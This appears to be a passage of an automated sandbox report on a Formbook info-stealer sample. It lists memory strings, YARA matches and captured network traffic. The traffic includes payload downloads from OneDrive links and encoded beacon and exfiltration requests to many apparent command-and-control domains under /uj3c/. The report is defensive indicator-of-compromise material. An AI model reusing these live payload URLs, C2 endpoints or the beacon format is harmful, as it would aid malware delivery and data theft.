Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 08 Aug 2022 18:14:24 GMTContent-Type: text/htmlContent-Length: 291ETag: "62f13bce-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Aug 2022 18:14:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 18:15:12 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 72 65 6e 64 69 64 64 61 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.trendiddas.com Port 80</address></body></html>
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: TR0627729920002.exe, Jwjxmakrv.exe.0.dr String found in binary or memory: http://www.emerge.deDVarFileInfo$
Source: rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.nomaxdic.com
Source: rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.nomaxdic.com/uj3c/
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/9
Source: Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/dK
Source: Jwjxmakrv.exe, 0000000E.00000003.316208412.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6Ib
Source: Jwjxmakrv.exe, 00000008.00000003.290900186.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa
Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzP
Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV51
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.296621597.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.289435198.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.325315312.000000000090C000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.317690202.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xB
Source: Jwjxmakrv.exe, 0000000E.00000003.319396319.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfB
Source: Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/2A
Source: Jwjxmakrv.exe, 0000000E.00000002.354269896.0000000003598000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/k
Source: unknown HTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: lValiHost: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: Host: onedrive.live.comCookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; xidseq=1; wla42=
Source: global traffic HTTP traffic detected: GET /y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1User-Agent: lValiHost: 2q5ira.ph.files.1drv.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1User-Agent: Host: 2q5ira.ph.files.1drv.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: lValiHost: onedrive.live.comCookie: wla42=
Source: global traffic HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: 6Host: onedrive.live.comCookie: wla42=; E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; xidseq=1
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1Host: www.meigsbuilds.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1Host: www.naturathome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1Host: www.nutricognition.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1Host: www.designgamagazine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1Host: www.kidsfundoor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1Host: www.empireapothecary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1Host: www.trendiddas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1Host: www.trisuaka.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1Host: www.nomaxdic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: Jwjxmakrv.exe, 00000008.00000002.323528611.00000000007FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
